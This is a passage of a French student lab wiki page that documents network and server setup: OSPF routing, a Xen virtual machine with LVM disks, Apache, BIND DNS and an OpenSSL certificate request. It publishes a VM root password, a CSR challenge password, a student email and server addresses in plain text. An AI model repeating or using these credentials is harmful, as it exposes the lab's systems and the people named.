   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.1   //Doute voir avec Redon !&lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51310</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51310"/>
				<updated>2019-11-28T11:42:20Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Diverses commandes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
